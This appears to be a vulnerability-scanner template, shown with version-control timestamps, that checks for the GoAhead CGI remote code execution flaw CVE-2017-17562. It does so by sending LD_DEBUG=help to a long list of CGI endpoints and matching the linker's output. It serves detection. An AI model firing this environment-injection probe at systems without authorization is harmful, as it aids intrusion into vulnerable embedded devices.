2021-03-27 21:22:33 +00:00
|
|
|
id: CVE-2017-17562
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Embedthis GoAhead RCE
|
|
|
|
|
description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
|
|
|
|
|
author: geeknik
|
2021-04-18 13:00:27 +00:00
|
|
|
reference: |
|
2021-03-27 21:22:33 +00:00
|
|
|
- https://www.elttam.com/blog/goahead/
|
|
|
|
|
- https://github.com/ivanitlearning/CVE-2017-17562
|
2021-04-01 07:58:30 +00:00
|
|
|
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
|
2021-03-27 21:22:33 +00:00
|
|
|
severity: high
|
2021-04-01 07:58:30 +00:00
|
|
|
tags: cve,cve2017,rce,embedthis,goahead,fuzz
|
2021-03-27 21:22:33 +00:00
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- payloads:
|
|
|
|
|
endpoint:
|
|
|
|
|
- admin
|
|
|
|
|
- apply
|
|
|
|
|
- non-CA-rev
|
|
|
|
|
- cgitest
|
|
|
|
|
- checkCookie
|
|
|
|
|
- check_user
|
|
|
|
|
- chn/liveView
|
|
|
|
|
- cht/liveView
|
|
|
|
|
- cnswebserver
|
|
|
|
|
- config
|
|
|
|
|
- configure/set_link_neg
|
|
|
|
|
- configure/swports_adjust
|
|
|
|
|
- eng/liveView
|
|
|
|
|
- firmware
|
|
|
|
|
- getCheckCode
|
|
|
|
|
- get_status
|
|
|
|
|
- getmac
|
|
|
|
|
- getparam
|
|
|
|
|
- guest/Login
|
|
|
|
|
- home
|
|
|
|
|
- htmlmgr
|
|
|
|
|
- index
|
|
|
|
|
- index/login
|
|
|
|
|
- jscript
|
|
|
|
|
- kvm
|
|
|
|
|
- liveView
|
|
|
|
|
- login
|
|
|
|
|
- login.asp
|
|
|
|
|
- login/login
|
|
|
|
|
- login/login-page
|
|
|
|
|
- login_mgr
|
|
|
|
|
- luci
|
|
|
|
|
- main
|
|
|
|
|
- main-cgi
|
|
|
|
|
- manage/login
|
|
|
|
|
- menu
|
|
|
|
|
- mlogin
|
|
|
|
|
- netbinary
|
|
|
|
|
- nobody/Captcha
|
|
|
|
|
- nobody/VerifyCode
|
|
|
|
|
- normal_userLogin
|
|
|
|
|
- otgw
|
|
|
|
|
- page
|
|
|
|
|
- rulectl
|
|
|
|
|
- service
|
|
|
|
|
- set_new_config
|
|
|
|
|
- sl_webviewer
|
|
|
|
|
- ssi
|
|
|
|
|
- status
|
|
|
|
|
- sysconf
|
|
|
|
|
- systemutil
|
|
|
|
|
- t/out
|
|
|
|
|
- top
|
|
|
|
|
- unauth
|
|
|
|
|
- upload
|
|
|
|
|
- variable
|
|
|
|
|
- wanstatu
|
|
|
|
|
- webcm
|
|
|
|
|
- webmain
|
|
|
|
|
- webproc
|
|
|
|
|
- webscr
|
|
|
|
|
- webviewLogin
|
|
|
|
|
- webviewLogin_m64
|
|
|
|
|
- webviewer
|
|
|
|
|
- welcome
|
|
|
|
|
raw:
|
|
|
|
|
- |
|
2021-04-01 07:58:30 +00:00
|
|
|
GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
|
2021-03-27 21:22:33 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
|
|
|
|
|
Accept: */*
|
|
|
|
|
Connection: close
|
|
|
|
|
|
2021-04-01 07:58:30 +00:00
|
|
|
attack: sniper
|
2021-03-27 21:22:33 +00:00
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
|
|
|
|
- 200
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
2021-03-29 20:04:26 +00:00
|
|
|
- "environment variable"
|
|
|
|
|
- "display library search paths"
|
|
|
|
|
condition: and
|
